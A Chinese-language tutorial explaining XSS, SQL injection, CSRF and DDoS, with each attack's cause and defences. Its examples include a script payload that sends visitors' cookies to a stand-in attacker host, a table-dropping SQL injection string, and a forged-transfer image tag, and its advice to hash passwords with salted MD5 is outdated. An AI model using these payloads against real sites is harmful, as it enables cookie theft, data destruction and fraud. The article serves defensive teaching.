總結幾種常見web攻擊手段極其防御方式

本文簡單介紹幾種常見的攻擊手段及其防御方式

• XSS(跨站腳本攻擊)
• CSRF（跨站請求偽造）
• SQL注入
• 總結幾種常見web攻擊手段極其防御方式

XSS

概念

• 全稱是跨站腳本攻擊（Cross Site Scripting），指攻擊者在網頁中嵌入惡意腳本程序。

案列

• 比如說我寫了一個博客網站，然后攻擊者在上面發布了一個文章，內容是這樣的 <script>window.open(“www.gongji.com?param=”+document.cookie)</script>,如果我沒有對他的內容進行處理，直接存儲到數據庫，那么下一次當其他用戶訪問他的這篇文章的時候，服務器從數據庫讀取后然后響應給客戶端，瀏覽器執行了這段腳本，然后就把該用戶的cookie發送到攻擊者的服務器了。

被攻擊的原因

• 用戶輸入的數據變成了代碼，比如說上面的<script>,應該只是字符串卻有了代碼的作用。

預防

• 將輸入的數據進行轉義處理，比如說講 < 轉義成&lt；

---

SQL注入

概念

• 通過sql命令偽裝成正常的http請求參數，傳遞到服務器端，服務器執行sql命令造成對數據庫進行攻擊

案例

• ' or '1'= '1。這是最常見的sql注入攻擊，當我們輸如用戶名 jiajun ，然后密碼輸如'or '1'= '1的時候，我們在查詢用戶名和密碼是否正確的時候，本來要執行的是select * from user where username='' and password='',經過參數拼接后，會執行sql語句 select * from user where username='jaijun' and password=' ' or ' 1'='1 '，這個時候1=1是成立，自然就跳過驗證了。
• 但是如果再嚴重一點，密碼輸如的是';drop table user;--，那么sql命令為select * from user where username='jiajun' and password='';drop table user;--' 這個時候我們就直接把這個表給刪除了

被攻擊的原因

• sql語句偽造參數，然后在對參數進行拼接的后形成破壞性的sql語句，最后導致數據庫受到攻擊

預防

• 在java中，我們可以使用預編譯語句(PreparedStatement)，這樣的話即使我們使用sql語句偽造成參數，到了服務端的時候，這個偽造sql語句的參數也只是簡單的字符，並不能起到攻擊的作用。
• 很多orm框架已經可以對參數進行轉義
• 做最壞的打算，即使被’拖庫‘('脫褲，數據庫泄露')。數據庫中密碼不應明文存儲的，可以對密碼使用md5進行加密，為了加大破解成本，所以可以采用加鹽的（數據庫存儲用戶名，鹽（隨機字符長），md5后的密文）方式。

---

CSRF

概念

• 全稱是跨站請求偽造(cross site request forgery),指通過偽裝成受信任用戶的進行訪問，通俗的講就是說我訪問了A網站，然后cookie存在了瀏覽器，然后我又訪問了一個流氓網站，不小心點了流氓網站一個鏈接（向A發送請求），這個時候流氓網站利用了我的身份對A進行了訪問。

案列

• 這個例子可能現實中不會存在，但是攻擊的方式是一樣的。比如說我登錄了A銀行網站，然后我又訪問了室友給的一個流氓網站，然后點了里面的一個鏈接 www.A.com/transfer?account=666&money=10000,那么這個時候很可能我就向賬號為666的人轉了1w軟妹幣
• 注意這個攻擊方式不一定是我點了這個鏈接，也可以是這個網站里面一些資源請求指向了這個轉賬鏈接，比如說一個<img src="http://www.A.com/transfer?account=666&money=10000">

被攻擊的原因

• 用戶本地存儲cookie，攻擊者利用用戶的cookie進行認證，然后偽造用戶發出請求

預防

• 之所以被攻擊是因為攻擊者利用了存儲在瀏覽器用於用戶認證的cookie，那么如果我們不用cookie來驗證不就可以預防了。所以我們可以采用token（不存儲於瀏覽器）認證。
• 通過referer識別，HTTP Referer是header的一部分，當瀏覽器向web服務器發送請求的時候，一般會帶上Referer，告訴服務器我是從哪個頁面鏈接過來的，服務器基此可以獲得一些信息用於處理。那么這樣的話，我們必須登錄銀行A網站才能進行轉賬了。

---

DDOS

概念

• 分布式拒絕服務攻擊（Distributed Denial of Service），簡單說就是發送大量請求是使服務器癱瘓。DDos攻擊是在DOS攻擊基礎上的，可以通俗理解，dos是單挑，而ddos是群毆，因為現代技術的發展，dos攻擊的殺傷力降低，所以出現了DDOS，攻擊者借助公共網絡，將大數量的計算機設備聯合起來，向一個或多個目標進行攻擊。

案例

• SYN Flood ,簡單說一下tcp三次握手，客戶端先服務器發出請求，請求建立連接，然后服務器返回一個報文，表明請求以被接受，然后客戶端也會返回一個報文，最后建立連接。那么如果有這么一種情況，攻擊者偽造ip地址，發出報文給服務器請求連接，這個時候服務器接受到了，根據tcp三次握手的規則，服務器也要回應一個報文，可是這個ip是偽造的，報文回應給誰呢，第二次握手出現錯誤，第三次自然也就不能順利進行了，這個時候服務器收不到第三次握手時客戶端發出的報文，又再重復第二次握手的操作。如果攻擊者偽造了大量的ip地址並發出請求，這個時候服務器將維護一個非常大的半連接等待列表，占用了大量的資源，最后服務器癱瘓。
• CC攻擊，在應用層http協議上發起攻擊，模擬正常用戶發送大量請求直到該網站拒絕服務為止。

被攻擊的原因

• 服務器帶寬不足，不能擋住攻擊者的攻擊流量

預防

• 最直接的方法增加帶寬。但是攻擊者用各地的電腦進行攻擊，他的帶寬不會耗費很多錢，但對於服務器來說，帶寬非常昂貴。
• 雲服務提供商有自己的一套完整DDoS解決方案，並且能提供豐富的帶寬資源

---

總結

• 上面一共提到了4中攻擊方式，分別是xss攻擊（關鍵是腳本，利用惡意腳本發起攻擊），CSRF攻擊（關鍵是借助本地cookie進行認證，偽造發送請求），SQL注入（關鍵是通過用sql語句偽造參數發出攻擊），DDOS攻擊（關鍵是通過手段發出大量請求，最后令服務器崩潰）
• 之所以攻擊者能成功攻擊，用戶操作是一個原因，服務器端沒有做好防御是一個問題，因為無法控制用戶的操作，所以需要我們服務器端的開發做好防御。
• 沒有覺得絕對安全，只要更安全。